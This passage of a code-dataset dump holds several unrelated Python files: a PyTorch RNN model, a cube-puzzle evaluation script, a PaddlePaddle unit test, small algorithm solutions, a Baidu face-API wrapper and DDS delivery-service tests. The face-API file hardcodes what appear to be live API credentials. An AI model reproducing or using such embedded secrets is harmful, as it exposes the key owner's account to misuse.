= {\"num_layers\": rnn_layers,\n \"batch_first\": True,\n \"dropout\": self.dropout if rnn_layers > 1 else 0}\n if rnn_type == \"lstm\":\n self.rnn = torch.nn.LSTM(*rnn_args, **rnn_kwargs)\n elif rnn_type == \"gru\":\n self.rnn = torch.nn.GRU(*rnn_args, **rnn_kwargs)\n #self.layer_norm = torch.nn.LayerNorm(normalized_shape=[self.hidden_size])\n \n # static part\n if self.static_idcs is not None:\n self.encode_static = torch.nn.Sequential(\n torch.nn.Linear(self.num_static_inputs, self.hidden_size),\n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size),\n torch.nn.LayerNorm(normalized_shape=[self.hidden_size]),\n torch.nn.ReLU(True),\n )\n # out part\n if use_out_mapping:\n self.out_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.hidden_size, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.out_size))\n if use_in_mapping:\n self.in_mlp = torch.nn.Sequential(\n torch.nn.Linear(self.num_recurrent_inputs, self.hidden_size), \n torch.nn.ReLU(True),\n torch.nn.Linear(self.hidden_size, self.hidden_size))\n self.hiddens = (torch.zeros(0), torch.zeros(0)) # init for TorchScript\n \n def make_preds(self, x, lens=None):\n if self.use_in_mapping:\n x = self.in_mlp(x)\n # apply rnn\n if lens is not None and self.use_lens:\n x = pack_padded_sequence(x, lens.cpu(), batch_first=True, enforce_sorted=False)\n x, self.hiddens = self.rnn(x)\n if lens is not None and self.use_lens:\n x, lens = pad_packed_sequence(x, batch_first=True)\n # apply mlp to transform \n if self.use_out_mapping:\n x = self.out_mlp(x)\n return x\n \n \n def make_preds_old(self, \n x: torch.Tensor, \n lens: Optional[torch.Tensor] = None, \n hiddens: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):\n \n # encode recurrence using rnn\n recurrent_stream = x[..., self.recurrent_idcs]\n if lens is not None:\n recurrent_stream = pack_padded_sequence(recurrent_stream, lens.cpu(), batch_first=True, enforce_sorted=False)\n recurrent_stream, self.hiddens = self.rnn(recurrent_stream)\n if lens is not None:\n recurrent_stream, lens = pad_packed_sequence(recurrent_stream, batch_first=True)\n #recurrent_stream = self.layer_norm(recurrent_stream)\n \n # encode static inputs\n if self.static_idcs is not None:\n static_stream = x[..., self.static_idcs]\n static_stream = self.encode_static(static_stream)\n else:\n static_stream = 0\n \n # apply mlp to transform \n x = self.out_mlp(static_stream + recurrent_stream)\n return x\n\n\nclass SequentialLoss(torch.nn.Module):#jit.ScriptModule):\n def __init__(self, regression, use_macro_loss, pos_weight, use_huber):\n super().__init__()\n self.regression = regression\n self.use_macro_loss = use_macro_loss\n self.pos_weight = pos_weight\n \n if regression:\n if use_huber:\n self.loss_func = torch.nn.SmoothL1Loss(reduction='mean')\n else:\n self.loss_func = torch.nn.MSELoss(reduction='mean')\n else:\n self.loss_func = torch.nn.BCEWithLogitsLoss(reduction='mean', pos_weight=pos_weight)\n\n def __call__(self, pred: torch.Tensor, target: torch.Tensor):\n \"\"\"Calculates the loss and considers missing values in the loss given by mask indicating where targets are NaN\"\"\"\n # shape: [BS, LEN, FEATS]\n mask = ~torch.isnan(target)\n \n if self.use_macro_loss:\n # Apply mask:\n num_feats = target.shape[-1]\n pred_per_pat = [pred_p[mask_p].reshape(-1, num_feats) for pred_p, mask_p in zip(pred, mask) if sum(mask_p) > 0]\n target_per_pat = [target_p[mask_p].reshape(-1, num_feats) for target_p, mask_p in zip(target, mask) if sum(mask_p) > 0]\n # calc raw loss per patient\n loss_per_pat = [self.loss_func(p, t) for p, t in zip(pred_per_pat, target_per_pat)]\n loss = torch.stack(loss_per_pat).mean()\n\n #if torch.isinf(loss) or torch.isnan(loss):\n # print(\"Found NAN or inf loss!\")\n # print(loss)\n # raise ValueError(\"Found NAN or inf!\")\n else:\n #print(pred.shape, target.shape, mask.shape)\n loss = self.loss_func(pred[mask], target[mask])\n\n return loss\n","repo_name":"agschweingruber/icp-pred","sub_path":"icp_pred/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":27575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39939745972","text":"import os\nimport argparse\n\nimport time\nimport pdb\nimport sys\nsys.path.append('./cube')\n\nimport pickle\nimport pandas as pd\nfrom multiprocessing import Pool\nimport numpy as np\nfrom tqdm import tqdm\nfrom utils import check_memory\nfrom str_cube import *\n\nTOL = 1e-4\n\nif os.path.exists('/local/hopan'):\n PREFIX = '/local/hopan/cube'\nelif os.path.exists('/scratch/hopan'):\n PREFIX = '/scratch/hopan/cube'\nelse:\n PREFIX = '/project2/risi/cube/'\n\ndef load_cube_df(nrows=None):\n df = pd.read_csv(os.path.join(PREFIX, 'cube_sym_mod.txt'), header=None, dtype={0:str, 1:int}, nrows=nrows)\n df.columns = ['cube', 'distance']\n return df\n\ndef load_cube_df_indexed(nrows=None):\n df = pd.read_csv(os.path.join(PREFIX, 'cube_sym_mod.txt'), header=None, dtype={0:str, 1:int}, nrows=nrows)\n df.columns = ['cube', 'distance', ]\n df['index'] = df.index\n df = df.set_index('cube')\n return df\n\ndef load_pkls():\n with open('/local/hopan/cube/cube2_pkls/idx_to_nbrs.pkl', 'rb') as f:\n idx_to_nbrs = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/idx_to_cube.pkl', 'rb') as f:\n idx_to_cube = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/idx_to_dist.pkl', 'rb') as f:\n idx_to_dist = pickle.load(f)\n with open('/local/hopan/cube/cube2_pkls/cube_to_idx.pkl', 'rb') as f:\n cube_to_idx = pickle.load(f)\n\n return idx_to_nbrs, idx_to_cube, idx_to_dist, cube_to_idx\n\ndef par_main(par_f, ncpu):\n global all_df\n all_df = load_cube_df_indexed()\n start = time.time()\n df_chunk = np.array_split(all_df, ncpu)\n idx_to_nbrs, idx_to_cube, idx_to_dist, cube_to_idx = load_pkls()\n arg_tups = [(idx, _d) for idx, _d in enumerate(df_chunk)]\n\n print('Starting par proc with {} processes...'.format(ncpu))\n check_memory()\n with Pool(ncpu) as p:\n map_res = p.starmap(par_f, arg_tups)\n\n print('Elapsed proc time: {:.2f}min'.format( (time.time() - start) / 60. ))\n return map_res\n\ndef irrep_feval(alpha, parts):\n fname_fmt = os.path.join(PREFIX, 'fourier_eval_sym_all/{}/{}.npy')\n print(fname_fmt)\n return np.load(fname_fmt.format(alpha, parts))\n\ndef par_irrep_main(par_f, alpha, parts, ncpu):\n global all_df\n all_df = load_cube_df_indexed()\n df_chunk = np.array_split(all_df[:20000], ncpu)\n real_mat = irrep_feval(alpha, parts).real\n arg_tups = [(idx, _d, real_mat) for idx, _d in enumerate(df_chunk)]\n\n print('Before pool | ', end='')\n check_memory()\n\n with Pool(ncpu) as p:\n map_res = p.starmap(par_f, arg_tups)\n par_correct, par_chosen_cubes = zip(*map_res) \n\n cat_correct = np.concatenate(par_correct)\n cat_chosen = np.concatenate(par_chosen_cubes)\n\n return cat_correct, cat_chosen\n\ndef proc_baseline(idx, df):\n '''\n df: dataframe whose index is cube strings\n '''\n global all_df\n props = np.zeros(len(df))\n i = 0\n for c in tqdm(df.index):\n nbrs = neighbors_fixed_core_small(c)\n nbr_df = all_df.loc[nbrs]\n nbr_idx = nbr_df['index'] # need this for indexing into mat\n min_dist = nbr_df.distance.min()\n min_cubes = nbr_df[nbr_df.distance == min_dist]\n\n props[i] = len(min_cubes) / len(nbrs)\n i += 1\n\n print('Proc {:2} done'.format(idx))\n return props\n\ndef proc_baseline_df(idx, df, mat):\n global all_df\n i = 0\n start =time.time()\n correct = np.zeros(len(df))\n chosen_cubes = np.zeros(len(df), dtype=int)\n\n print('Proc {:2} started | '.format(idx), end='')\n check_memory()\n \n for c in (df.index):\n nbrs = neighbors_fixed_core_small(c)\n nbr_df = all_df.loc[nbrs]\n nbr_idx = nbr_df['index'] # need this for indexing into mat\n min_dist = nbr_df.distance.min()\n min_cubes = nbr_df[nbr_df.distance == min_dist]\n\n vals = mat[nbr_idx]\n n_idx = np.argmin(vals)\n min_irrep_cube = nbrs[n_idx] # this gives the index\n correct[i] = (min_irrep_cube in min_cubes.index)\n chosen_cubes[i] = all_df.loc[min_irrep_cube]['index']\n i += 1\n\n end = time.time()\n print('Proc {:2} done: {:.2f}mins'.format(idx, (end - start) / 60.))\n return correct, chosen_cubes\n\n\ndef maybe_mkdir(d):\n try:\n os.makedirs(d)\n except:\n print('Already exists: {}'.format(d))\n\nif __name__ == '__main__':\n start = time.time()\n parser = argparse.ArgumentParser()\n parser.add_argument('--alpha', type=str, default='(2, 3, 3)')\n parser.add_argument('--parts', type=str, default='((2,), (1, 1, 1), (1, 1, 1))')\n parser.add_argument('--ncpu', type=int, default=8, help='Amount of parallelism')\n parser.add_argument('--baseline', action='store_true')\n parser.add_argument('--savedir', type=str, default=os.path.join(PREFIX, 'fourier_eval_results'))\n args = parser.parse_args()\n\n if args.baseline:\n random_baseline_fname = os.path.join(args.savedir, 'baseline')\n res = par_main(proc_baseline, args.ncpu)\n print('Avg: {:.5f}'.format(np.mean(res)))\n np.save(random_baseline_fname, res)\n else:\n alpha = eval(args.alpha)\n parts = eval(args.parts)\n correct, chosen = par_irrep_main(proc_baseline_df, alpha, parts, args.ncpu)\n print('{:.8f}|{}|{}'.format(np.mean(correct), alpha, parts))\n\n corr_dir = os.path.join(args.savedir, str(alpha), str(parts))\n chos_dir = os.path.join(args.savedir, str(alpha), str(parts))\n maybe_mkdir(corr_dir)\n maybe_mkdir(chos_dir)\n\n corr_fname = os.path.join(corr_dir, 'correct.npy')\n chos_fname = os.path.join(chos_dir, 'chosen.npy')\n print('Saving to: {}'.format(corr_fname))\n print('Saving to: {}'.format(chos_fname))\n np.save(corr_fname, correct)\n np.save(chos_fname, chosen)\n elapsed_time = (time.time() - start) / 60.\n print('Done! Total time: {:.2f}mins'.format(elapsed_time))\n","repo_name":"horacepan/SnFFT","sub_path":"compute_policy.py","file_name":"compute_policy.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19109892445","text":"import pandas as pd\nimport os\n\n\ndef build_feature_matrix(antibiotic='ciprofloxacin', group='Proteobacteria', threshold=0.05):\n\n folder = os.path.join('data_files', 'subproblems', group + '_' + antibiotic, 'sp_genes')\n\n #lists for DataFrame\n ids = []\n antibiotics = []\n phenotypes = []\n annotation = []\n features = []\n\n functions = set()\n\n ids_dict = {}\n\n for directory in os.listdir(folder):\n genome = directory.split('_')[0]\n spgenes_file = genome + '.PATRIC.spgene.tab'\n feat_dict = {}\n df = pd.read_csv(os.path.join(folder, directory, spgenes_file), sep='\\t')\n for function in df['function']:\n if type(function) is str:\n if function not in feat_dict.keys():\n feat_dict[function] = 1\n else:\n feat_dict[function] += 1\n ids_dict[genome] = feat_dict\n\n for id in ids_dict.keys():\n functions = functions.intersection(set(ids_dict[id].keys()))\n\n if antibiotic == 'ciprofloxacin':\n pheno_file = os.path.join('data_files', 'proteobacteria_ciprofloxacin.csv')\n elif antibiotic == 'betalactam':\n pheno_file = os.path.join('data_files', 'betalactam_firmicutes_samples.csv')\n elif antibiotic == 'erythromycin':\n pheno_file = os.path.join('data_files', 'erythromycin_firmicutes_samples.csv')\n\n pheno_df = pd.read_csv(pheno_file)\n if 'Genome ID' in pheno_df.columns:\n pheno_df.rename(columns={'Genome ID': 'ID'}, inplace=True)\n if 'Resistance Phenotype' in pheno_df.columns:\n pheno_df.rename(columns={'Resistance Phenotype': 'Phenotype'}, inplace=True)\n\n for id in ids_dict.keys():\n ids.append(id)\n antibiotics.append([antibiotic])\n phenotypes.append([pheno_df['Phenotype'][pheno_df['ID'].tolist().index(id)]])\n annotation.append(['True'])\n genome_features = []\n for func in functions:\n genome_features.append(ids_dict[id][func])\n features.append(genome_features)\n\n file_dict = {'ID': ids, 'Antibiotic': antibiotics, 'Phenotype': phenotypes, 'Annotation': annotation, 'Features': features}\n file_df = pd.DataFrame(file_dict)\n #Creating file from which the X matric (feature matrix), and the y vector (target values vector) can be created\n file_df.to_csv(os.path.join('data_files', group + '_' + antibiotic + '_sample.csv'), index=False)\n\nif __name__ == \"__main__\":\n build_feature_matrix()\n","repo_name":"Elliot-L/DendroNet","sub_path":"patric_application/build_features_file.py","file_name":"build_features_file.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36029793381","text":"import unittest\n\nimport numpy as np\nfrom op_test import OpTest\n\nimport paddle\nfrom paddle import base\n\n\ndef size_wrapper(input):\n return paddle.numel(paddle.to_tensor(input))\n\n\nclass TestSizeOp(OpTest):\n def setUp(self):\n self.op_type = \"size\"\n self.python_api = size_wrapper\n self.shape = []\n self.config()\n input = np.zeros(self.shape, dtype='bool')\n self.inputs = {'Input': input}\n self.outputs = {'Out': np.array(np.size(input), dtype='int64')}\n\n def config(self):\n pass\n\n def test_check_output(self):\n self.check_output()\n\n\nclass TestRank1Tensor(TestSizeOp):\n def config(self):\n self.shape = [2]\n\n\nclass TestRank2Tensor(TestSizeOp):\n def config(self):\n self.shape = [2, 3]\n\n\nclass TestRank3Tensor(TestSizeOp):\n def config(self):\n self.shape = [2, 3, 100]\n\n\nclass TestLargeTensor(TestSizeOp):\n def config(self):\n self.shape = [2**10]\n\n\nclass TestSizeAPI(unittest.TestCase):\n def test_size_static(self):\n main_program = base.Program()\n startup_program = base.Program()\n with base.program_guard(main_program, startup_program):\n shape1 = [2, 1, 4, 5]\n shape2 = [1, 4, 5]\n x_1 = paddle.static.data(shape=shape1, dtype='int32', name='x_1')\n x_2 = paddle.static.data(shape=shape2, dtype='int32', name='x_2')\n input_1 = np.random.random(shape1).astype(\"int32\")\n input_2 = np.random.random(shape2).astype(\"int32\")\n out_1 = paddle.numel(x_1)\n out_2 = paddle.numel(x_2)\n exe = paddle.static.Executor(place=paddle.CPUPlace())\n res_1, res_2 = exe.run(\n feed={\n \"x_1\": input_1,\n \"x_2\": input_2,\n },\n fetch_list=[out_1, out_2],\n )\n np.testing.assert_array_equal(\n res_1, np.array(np.size(input_1)).astype(\"int64\")\n )\n np.testing.assert_array_equal(\n res_2, np.array(np.size(input_2)).astype(\"int64\")\n )\n\n def test_size_imperative(self):\n paddle.disable_static(paddle.CPUPlace())\n input_1 = np.random.random([2, 1, 4, 5]).astype(\"int32\")\n input_2 = np.random.random([1, 4, 5]).astype(\"int32\")\n x_1 = paddle.to_tensor(input_1)\n x_2 = paddle.to_tensor(input_2)\n out_1 = paddle.numel(x_1)\n out_2 = paddle.numel(x_2)\n np.testing.assert_array_equal(out_1.numpy().item(0), np.size(input_1))\n np.testing.assert_array_equal(out_2.numpy().item(0), np.size(input_2))\n paddle.enable_static()\n\n def test_error(self):\n main_program = base.Program()\n startup_program = base.Program()\n with base.program_guard(main_program, startup_program):\n\n def test_x_type():\n shape = [1, 4, 5]\n input_1 = np.random.random(shape).astype(\"int32\")\n out_1 = paddle.numel(input_1)\n\n self.assertRaises(TypeError, test_x_type)\n\n\nif __name__ == '__main__':\n paddle.enable_static()\n unittest.main()\n","repo_name":"PaddlePaddle/Paddle","sub_path":"test/legacy_test/test_size_op.py","file_name":"test_size_op.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"23258897423","text":"class Solution:\n def isPalindrome(self, s):\n i, j = 0, len(s) - 1\n while i < j:\n while i < j and not s[i].isalnum():\n i += 1\n while i < j and not s[j].isalnum():\n j -= 1\n if s[i].lower() != s[j].lower():\n return False\n i, j = i + 1, j - 1\n return True\n\n\nif __name__ == \"__main__\":\n s = \" A man, a plan, a canal; panama \"\n sol = Solution()\n print(s)\n print(sol.isPalindrome(s))","repo_name":"codingyen/CodeAlone","sub_path":"Python/0125_valid_palindrome.py","file_name":"0125_valid_palindrome.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"5787694274","text":"'''\n- Using max heap, removing half of the topmost value.\n- Increment count by 1.\n'''\nclass Solution:\n def halveArray(self, nums: List[int]) -> int:\n req = sum(nums)\n tot = req\n req = req/2\n for i in range(len(nums)):\n nums[i] = -nums[i]\n heapq.heapify(nums)\n count = 0\n while len(nums)>0 and tot>req:\n cur = -heapq.heappop(nums)\n nex = cur/2\n diff = cur-nex\n tot-=diff\n if nex>0:\n heapq.heappush(nums,-nex)\n count+=1\n return count","repo_name":"shivamnegi1705/Leetcode-Contests","sub_path":"Biweekly Contest 74/2208. Minimum Operations to Halve Array Sum.py","file_name":"2208. Minimum Operations to Halve Array Sum.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19621094586","text":"# -*- coding: utf-8 -*-\n# @Time: 2020/6/15 23:03\n# @Author: GraceKoo\n# @File: interview_24.py\n# @Desc: https://leetcode-cn.com/problems/er-cha-shu-zhong-he-wei-mou-yi-zhi-de-lu-jing-lcof/solution/\n\nfrom typing import List\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def pathSum(self, root: TreeNode, sum: int) -> List[List[int]]:\n res, path = [], [] # 用于存放最终的结果,与当前遍历的路径\n\n # 输入当前的遍历的节点,与当前的目标值\n def recur(root, tar):\n if not root:\n return\n path.append(root.val)\n tar -= root.val\n if tar == 0 and not root.left and not root.right:\n res.append(list(path))\n # 如果已经找到了一条路径,那么下面两行会直接return,所以这样写也没关系\n recur(root.left, tar)\n recur(root.right, tar)\n path.pop()\n\n recur(root, sum)\n return res\n","repo_name":"asdf2014/algorithm","sub_path":"Codes/gracekoo/interview_24.py","file_name":"interview_24.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"29"} +{"seq_id":"40344416865","text":"#coding=utf-8 \r\nfrom aip import AipFace\r\nimport base64\r\nimport chardet\r\n\r\nAPP_ID = '11312620'\r\nAPI_KEY = 'DRnZxYs8pt07OSPUCxXpuiIS'\r\nSECRET_KEY = 'UnGXXwkbPxVSAyooEd8WvDzL0VvajVVq'\r\n\r\nclient = AipFace(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n#用base64编码图片\r\ndef get_file_content(filePath):\r\n with open(filePath, mode='rb') as f:\r\n # print(\"ok,稍等\")\r\n return base64.b64encode(f.read()).decode(\"utf-8\")\r\n\r\n\r\n\r\n\r\n\r\n#-----------------人脸检测------\r\n\r\ndef detect(image,imageType):\r\n\r\n #如果有可选参数 \"\"\"\r\n options = {}\r\n options[\"face_field\"] = \"age,beauty,gender\"\r\n options[\"max_face_num\"] = 2\r\n options[\"face_type\"] = \"LIVE\"\r\n\r\n #带参数调用人脸检测\r\n return client.detect(image, imageType, options)\r\n\r\n\r\n\r\n#--------------人脸注册----------------------\r\n# 如果有可选参数 \"\"\" 可以是face_token\r\n\r\ndef addUser(image , imageType , group_id , user_id ):\r\n options = {}\r\n options[\"user_info\"] = \"user's info\"\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"NONE\"\r\n\r\n # 带参数调用人脸注册 \"\"\"\r\n return client.addUser(image, imageType, group_id , user_id, options)\r\n\r\n\r\n\r\n\r\n#--------------人脸搜索----------------------\r\n# 如果有可选参数 \"\"\"\r\ndef search(image , imageType):\r\n groupIdList = \"test\"\r\n\r\n \"\"\" 如果有可选参数 \"\"\"\r\n options = {}\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"NONE\"\r\n\r\n options[\"max_user_num\"] = 2\r\n\r\n \"\"\" 带参数调用人脸搜索 \"\"\"\r\n return client.search(image, imageType, groupIdList,options);\r\n\r\n\r\n#--------------人脸更新---------------------\r\ndef updateUsers(image,imageType,groupId, userId):\r\n # 如果有可选参数 \"\"\"\r\n options = {}\r\n options[\"user_info\"] = \"user's info\"\r\n options[\"quality_control\"] = \"NORMAL\"\r\n options[\"liveness_control\"] = \"LOW\"\r\n\r\n # 带参数调用人脸更新 \"\"\"\r\n return client.updateUser(image, imageType, groupId, userId, options)\r\n\r\n#--------------人脸删除---------------------\r\ndef getUsers(userId, groupId, faceToken):\r\n # 调用人脸删除 \"\"\"\r\n return client.faceDelete(userId, groupId, faceToken)\r\n\r\n\r\n#--------------信息查询---------------------\r\ndef getUsers(userId, groupId):\r\n # 调用用户信息查询 \"\"\"\r\n return client.getUser(userId, groupId)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lsy641/face-recogniton-demo-using-BaiduAIPlatform","sub_path":"bd-face-api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"69854854233","text":"import json\nimport random\nimport tempfile\nfrom mock import MagicMock, AsyncMock, create_autospec, patch, call\n\nfrom tornado.testing import AsyncTestCase, gen_test\nfrom tornado.gen import coroutine\n\nfrom delivery.services.external_program_service import ExternalProgramService\nfrom delivery.services.dds_service import DDSService\nfrom delivery.models.db_models import DeliveryOrder, StagingOrder, StagingStatus, DeliveryStatus\nfrom delivery.models.execution import ExecutionResult, Execution\nfrom delivery.models.project import DDSProject\nfrom delivery.exceptions import InvalidStatusException\n\nfrom tests.test_utils import assert_eventually_equals\n\n\nclass TestDDSService(AsyncTestCase):\n\n def setUp(self):\n self.mock_dds_runner = create_autospec(ExternalProgramService)\n mock_process = MagicMock()\n mock_execution = Execution(\n pid=random.randint(1, 1000),\n process_obj=mock_process)\n self.mock_dds_runner.run.return_value = mock_execution\n\n @coroutine\n def wait_as_coroutine(x):\n return ExecutionResult(\n stdout=\"\",\n stderr=\"\",\n status_code=0)\n\n self.mock_dds_runner.wait_for_execution = wait_as_coroutine\n\n self.mock_staging_service = MagicMock()\n self.mock_delivery_repo = MagicMock()\n\n self.delivery_order = DeliveryOrder(\n id=1,\n delivery_source=\"/staging/dir/bar\",\n delivery_project=\"snpseq00001\",\n )\n\n self.mock_delivery_repo.create_delivery_order.return_value = self.delivery_order\n self.mock_delivery_repo.get_delivery_order_by_id.return_value = self.delivery_order\n\n self.mock_session_factory = MagicMock()\n self.mock_dds_config = {\n 'log_path': '/foo/bar/log',\n }\n self.dds_service = DDSService(\n external_program_service=ExternalProgramService(),\n staging_service=self.mock_staging_service,\n staging_dir='/foo/bar/staging_dir',\n delivery_repo=self.mock_delivery_repo,\n session_factory=self.mock_session_factory,\n dds_conf=self.mock_dds_config,\n )\n\n # Inject separate external runner instances for the tests, since they\n # need to return different information\n self.dds_service.dds_external_program_service = self.mock_dds_runner\n self.dds_service.external_program_service = self.mock_dds_runner\n\n self.token_file = tempfile.NamedTemporaryFile(mode='w+')\n self.token_file.write('ddstoken')\n self.token_file.flush()\n\n super(TestDDSService, self).setUp()\n\n @gen_test\n def test_dds_put(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n project_id = 'snpseq00001'\n deadline = '90'\n\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n with patch('shutil.rmtree') as mock_rmtree:\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(\n staging_id=1,\n deadline=deadline,\n )\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self, 1,\n _get_delivery_order,\n DeliveryStatus.delivery_successful)\n\n mock_rmtree.assert_called_once_with(staging_target)\n\n self.mock_dds_runner.run.assert_has_calls([\n call([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'data', 'put',\n '--mount-dir', '/foo/bar/staging_dir',\n '--source', staging_target,\n '--project', project_id,\n '--silent'\n ]),\n call([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'status', 'release',\n '--project', project_id,\n '--deadline', deadline,\n ]),\n ])\n\n @gen_test\n def test_dds_put_no_release(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n project_id = 'snpseq00001'\n deadline = '90'\n\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id=project_id)\n\n with patch('shutil.rmtree') as mock_rmtree:\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(\n staging_id=1,\n deadline=deadline,\n release=False,\n )\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self, 1,\n _get_delivery_order,\n DeliveryStatus.delivery_successful)\n\n mock_rmtree.assert_called_once_with(staging_target)\n\n self.mock_dds_runner.run.assert_called_once_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'data', 'put',\n '--mount-dir', '/foo/bar/staging_dir',\n '--source', staging_target,\n '--project', project_id,\n '--silent'\n ])\n\n def test_dds_project_with_token_string(self):\n expected_token_string = \"supersecretstring\"\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=expected_token_string,\n dds_project_id='snpseq00001')\n\n with open(dds_project.temporary_token.name) as token:\n actual_token_string = token.read()\n\n self.assertEqual(actual_token_string, expected_token_string)\n self.assertEqual(\n dds_project.temporary_token.name,\n dds_project._base_cmd[2])\n\n @gen_test\n def test_dds_put_raises_on_non_existent_stage_id(self):\n self.mock_staging_service.get_stage_order_by_id.return_value = None\n\n with self.assertRaises(InvalidStatusException):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1)\n\n @gen_test\n def test_dds_put_raises_on_non_successful_stage_id(self):\n\n staging_order = StagingOrder()\n staging_order.status = StagingStatus.staging_failed\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n with self.assertRaises(InvalidStatusException):\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1)\n\n def test_delivery_order_by_id(self):\n delivery_order = DeliveryOrder(\n id=1,\n delivery_source='src',\n delivery_project='snpseq00001',\n delivery_status=DeliveryStatus.delivery_in_progress,\n staging_order_id=11,\n )\n self.mock_delivery_repo.get_delivery_order_by_id.return_value = delivery_order\n actual = self.dds_service.get_delivery_order_by_id(1)\n self.assertEqual(actual.id, 1)\n\n @gen_test\n def test_possible_to_delivery_by_staging_id_and_skip_delivery(self):\n source = '/foo/bar'\n staging_target = '/staging/dir/bar'\n staging_order = StagingOrder(\n source=source,\n staging_target=staging_target)\n staging_order.status = StagingStatus.staging_successful\n self.mock_staging_service.get_stage_order_by_id.return_value = staging_order\n\n self.mock_staging_service.get_delivery_order_by_id.return_value = self.delivery_order\n\n dds_project = DDSProject(\n dds_service=self.dds_service,\n auth_token=self.token_file.name,\n dds_project_id='snpseq00001')\n\n with patch(\n 'delivery.models.project'\n '.DDSProject.get_ngi_project_name',\n new_callable=AsyncMock,\n return_value='AB-1234'):\n yield dds_project.put(staging_id=1, skip_delivery=True)\n\n def _get_delivery_order():\n return self.delivery_order.delivery_status\n\n assert_eventually_equals(\n self,\n 1,\n _get_delivery_order,\n DeliveryStatus.delivery_skipped)\n\n def test_parse_dds_project_id(self):\n dds_output = \"\"\"Current user: bio\nProject created with id: snpseq00003\nUser forskare was associated with Project snpseq00003 as Owner=True. An e-mail notification has not been sent.\nInvitation sent to email@adress.com. The user should have a valid account to be added to a\nproject\"\"\"\n\n self.assertEqual(\n DDSProject._parse_dds_project_id(dds_output),\n \"snpseq00003\")\n\n @gen_test\n def test_create_project(self):\n project_name = \"AA-1221\"\n project_metadata = {\n \"description\": \"Dummy project\",\n \"pi\": \"alex@doe.com\",\n \"researchers\": [\"robin@doe.com\", \"kim@doe.com\"],\n \"owners\": [\"alex@doe.com\"],\n }\n\n with patch(\n 'delivery.models.project'\n '.DDSProject._parse_dds_project_id'\n ) as mock_parse_dds_project_id:\n mock_parse_dds_project_id.return_value = \"snpseq00001\"\n\n yield DDSProject.new(\n project_name,\n project_metadata,\n auth_token=self.token_file.name,\n dds_service=self.dds_service)\n\n self.mock_dds_runner.run.assert_called_with([\n 'dds',\n '--token-path', self.token_file.name,\n '--log-file', '/foo/bar/log',\n '--no-prompt',\n 'project', 'create',\n '--title', project_name.replace('-', ''),\n '--description', f'\"{project_metadata[\"description\"]}\"',\n '-pi', project_metadata['pi'],\n '--owner', project_metadata['owners'][0],\n '--researcher', project_metadata['researchers'][0],\n '--researcher', 